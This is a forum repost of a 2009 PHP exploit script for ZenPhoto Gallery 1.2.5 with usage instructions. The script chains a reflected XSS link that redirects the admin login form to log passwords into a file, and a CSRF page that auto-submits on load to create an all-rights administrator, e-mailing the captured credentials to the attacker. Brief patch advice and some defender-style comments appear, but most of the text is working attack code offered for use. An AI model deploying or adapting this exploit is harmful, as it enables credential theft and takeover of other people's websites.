

    ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)


    ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)

    Post by Foxi on Thu Jul 23, 2009 4:16 am

    Code:
    <?php
    ####################################################################
    #    Zen Photo Administrator Password Steal/Reset Exploit         #
    #+================================================================+#
    #    Discovered and coded by petros [at] dusecurity.com          #
    #+----------------------------------------------------------------+#
    #    Affects: ZenPhoto Gallery 1.2.5                        #
    #+----------------------------------------------------------------+#
    # Zenphoto is an answer to lots of calls for an online            #
    # gallery solution that just makes sense. After years of          #
    # bloated software that does everything and your dishes,          #
    # zenphoto just shows your photos, simply. It’s got all the        # 
    # functionality and “features” you need, and nothing you don’t.    #
    # Where the old guys put in a bunch of modules and junk, we put    #
    # a lot of thought. We hope you agree with our philosopy:          #
    # simpler is better. Don’t get us wrong though –zenphoto really    #
    # does have everything you need for your online gallery.          #
    #+================================================================+#
    #   Exploit Explanation                       #
    #+================================================================+#
    #                                                                  #
    # This exploit actually takes advantage of two vulnerabilities.    #
    # The first exploit is a simple XSS in the admin login page        #
    # that will allow us to log the admin's password. Unfortunately,  #
    # it only executes if the admin is NOT already logged in.          #
    # The second is a CSRF exploit that allows you to change the      #
    # admins password by automatically submitting a form.              #
    # This exploit only works if the admin already logged in.          #
    # Combine these and we have two ways to gain admin access          #
    #                                                                  #
    #+--------------------------------------------------------------=-+#
    # How to patch/prevent these vulnerabilities                       #
    #+--------------------------------------------------------------=-+#
    #                                                                  #
    # The XSS in the zp-core/admin.php page can be patched by          #
    # sanitizing the $_GET['from'] variable before outputting it       #
    #                                                                  #
    # The CSRF requires either some form of referrer checking or a     #
    # hidden security token on all forms (the latter would be better) #
    #                                                                  #
    #+----------------------------------------------------------------+#
    # How to use this exploit to take over a ZenPhoto website          #
    #+----------------------------------------------------------------+#
    #                                                                  #
    # To use the XSS logger make the admin click this link:            #
    #                                                                  #
    #+--[code snippet - put this all in one line]--+                  #
    # http://victimsite.com/zp-core/admin.php?from="><script>          #
    # document.forms[0].action="[logged url]";                        #
    # </script><div id="lolpwnt                                        #
    #+--[ end of code snippet]--+                                      #
    #                                                                  #
    # Replace [logger url] with the link to this PHP script            #
    # Make sure your log.txt is writable before doing this            #
    # On login the admins password will be saved to the file.          #
    #                                                                  #
    # The next exploit is used by simply giving the link to            #
    # this script to the admin. if he clicks it his password          #
    # will be changed automatically to "ownedbydusec"                  #
    #                                                                  #
    # That's about it :) Enjoy!                                        #
    ####################################################################
    #            petros [at] dusecurity [dot] com                      #
    ####################################################################


    //* Configure the exploit *//
    // Reviewer note: none of these values is validated; $site is interpolated
    // verbatim into the form action and the e-mail body further down.
    $site = "http://victim.org/zen-photo";  // URL to vulnerable ZP install (no trailing slash!!)
    $log = "log.txt";         // File to save logs to
    $user = "admin";         // Name of the new admin
    $pass = "ownedbydusec";         // New admin pass
    $email = "you@site.com";      // Email to send log notifications to
    // Do not edit below this line...

    // Branch 1: a non-empty request body means a login form was pointed at this
    // script (the reflected XSS on zp-core/admin.php described in the header).
    // Every submitted field is appended to $log verbatim, keyed by client IP.
    if($_POST)// We got logins from the XSS phisher
    {
       $file = fopen($log, 'a');
       if(!$file) redirect();
       fwrite($file,"--==[{$_SERVER['REMOTE_ADDR']}]==--\r\n");
       foreach($_POST as $key => $value)
          fwrite($file, "$key = $value\r\n");
       fwrite($file,"\r\n");
       fclose($file);
       // '@' silences any mail() warning so the response stays a clean redirect.
       @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)");
       redirect(); //send the back to the admin page
       
    }
    // Branch 2 (no POST body): render a page whose form is submitted on load by
    // the visiting browser, carrying that browser's own session cookie. The
    // hidden fields below mirror the target's admin-options form; note that
    // none of them is a per-session token — that absence is the CSRF weakness
    // the header's "How to patch" section points at.
    else // try to create a new admin using CRSF
    {
       $inputs = array(
    "saveadminoptions" => "true",

    "totaladmins" => "1",

    "alter_enabled" => "1",

    "0-adminuser" => $user,

    "0-confirmed" => "2",

    "0-adminpass" => $pass,

    "0-adminpass_2" => $pass,

    "0-admin_rights" => "1",

    "0-options_rights" => "1",

    "0-zenpage_rights" => "1",

    "0-tags_rights" => "1",

    "0-themes_rights" => "1",

    "0-all_album_rights" => "1",

    "0-edit_rights" => "1",

    "0-comment_rights" => "1",

    "0-upload_rights" => "1",

    "0-view_rights" => "1",

    "0-main_rights" => "1",

    "0-admin_name" => "Owned by dusecurity.com",

    "0-admin_email" => 'petros was here <3'
    );
       // Defender's note: server-side this is a POST to
       // zp-core/admin-options.php?action=saveoptions from an already
       // authenticated session, originating from a third-party page. A
       // per-request token bound to the session, or a same-origin check on the
       // handler, is what would make the request fail.
       $action = $site."/zp-core/admin-options.php?action=saveoptions";
       echo "<html><head><script>function badboy(){ document.forms[0].submit();{</script></head>";
       echo "<body onload=\"badboy();\"><form action=\"$action\" method=\"POST\">";
       foreach($inputs as $key => $value)
       {
          echo "<input name=\"$key\" value=\"$value\" type=\"hidden\" />";
       }
       echo '<input type="submit" value="Click Me!" />'; //not that they have a choice lol
       echo "</form></body></html>";
       // notify them by e-mail because the admin will probably notice he cant login
       @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass");
    }


    // Emits a Location header built from $site pointing at the admin login page,
    // then stops the script.
    function redirect(){ header("Location: $site/zp-core/admin.php");exit; }

    ?>

    # milw0rm.com [2009-07-16]

